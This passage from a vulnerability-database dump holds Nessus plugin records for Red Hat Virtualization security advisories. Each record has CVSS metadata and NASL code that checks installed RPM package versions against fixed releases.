'content/dist/layered/rhel8/x86_64/rhvh-build/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cockpit-ovirt-dashboard-0.14.15-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'exists_check':'redhat-release-virtualization-host-4'},\n {'reference':'redhat-virtualization-host-image-update-4.4.3-20201210.0.el8_3', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'redhat-release-virtualization-host-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'cockpit-ovirt-dashboard / redhat-virtualization-host-image-update');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T14:44:32", "description": "An update for ovirt-web-ui is now available for Red Hat Virtualization Engine 4.3.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe ovirt-web-ui package provides the web interface for Red Hat Virtualization.\n\nSecurity Fix(es) :\n\n* nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties (CVE-2019-10744)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute (CVE-2019-8331)\n\n* js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Known moderate severity security vulnerability detected by GitHub on ovirt-web-ui components (BZ#1694032)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-15T00:00:00", "type": "nessus", "title": "RHEL 7 : Virtualization Manager (RHSA-2019:3024)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744", "CVE-2019-11358", "CVE-2019-8331"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-3024.NASL", "href": "https://www.tenable.com/plugins/nessus/129862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3024. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129862);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-10744\", \"CVE-2019-11358\", \"CVE-2019-8331\");\n script_xref(name:\"RHSA\", value:\"2019:3024\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"RHEL 7 : Virtualization Manager (RHSA-2019:3024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for ovirt-web-ui is now available for Red Hat Virtualization\nEngine 4.3.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe ovirt-web-ui package provides the web interface for Red Hat\nVirtualization.\n\nSecurity Fix(es) :\n\n* nodejs-lodash: prototype pollution in defaultsDeep function leading\nto modifying properties (CVE-2019-10744)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* js-jquery: prototype pollution in object's prototype leading to\ndenial of service or remote code execution or property injection\n(CVE-2019-11358)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Known moderate severity security vulnerability detected by GitHub on\novirt-web-ui components (BZ#1694032)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3024\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-8331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-10744\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-11358\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ovirt-web-ui package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10744\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3024\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"ovirt-web-ui-1.6.0-1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ovirt-web-ui\");\n }\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-02-10T14:53:55", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:5179 advisory.\n\n - nodejs-handlebars: lookup helper fails to properly validate templates allowing for arbitrary JavaScript execution (CVE-2019-20920)\n\n - nodejs-handlebars: an endless loop while processing specially-crafted templates leads to DoS (CVE-2019-20922)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2020-11-24T00:00:00", "type": "nessus", "title": "RHEL 8 : Red Hat Virtualization (RHSA-2020:5179)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20920", "CVE-2019-20922", "CVE-2020-8203"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:8:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-backend:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-dbscripts:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-restapi:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-base:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine-common:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-vmconsole-proxy-helper:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-websocket-proxy:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-tools:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-tools-backup:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-vmconsole-proxy-helper:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-webadmin-portal:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-websocket-proxy:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-web-ui:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-health-check-bundler:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:rhvm:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-cinderlib:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:ovirt-engine-setup-plugin-imageio:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:python3-ovirt-engine-lib:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-5179.NASL", "href": "https://www.tenable.com/plugins/nessus/143235", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:5179. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143235);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\"CVE-2019-20920\", \"CVE-2019-20922\", \"CVE-2020-8203\");\n script_xref(name:\"RHSA\", value:\"2020:5179\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"RHEL 8 : Red Hat Virtualization (RHSA-2020:5179)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:5179 advisory.\n\n - nodejs-handlebars: lookup helper fails to properly validate templates allowing for arbitrary JavaScript\n execution (CVE-2019-20920)\n\n - nodejs-handlebars: an endless loop while processing specially-crafted templates leads to DoS\n (CVE-2019-20922)\n\n - nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-20920\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-20922\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8203\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:5179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1882256\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1882260\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-20920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-backend\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dbscripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-health-check-bundler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-restapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-cinderlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-imageio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-vmconsole-proxy-helper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-websocket-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools-backup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-vmconsole-proxy-helper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-webadmin-portal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-websocket-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-ovirt-engine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhvm\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'ovirt-engine-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-backend-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-dbscripts-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-health-check-bundler-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-restapi-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-base-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-cinderlib-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-imageio-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-ovirt-engine-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-ovirt-engine-common-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-websocket-proxy-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-tools-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-tools-backup-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-vmconsole-proxy-helper-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-webadmin-portal-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-websocket-proxy-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-web-ui-1.6.5-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'python3-ovirt-engine-lib-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'rhvm-4.4.3.8-0.1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n 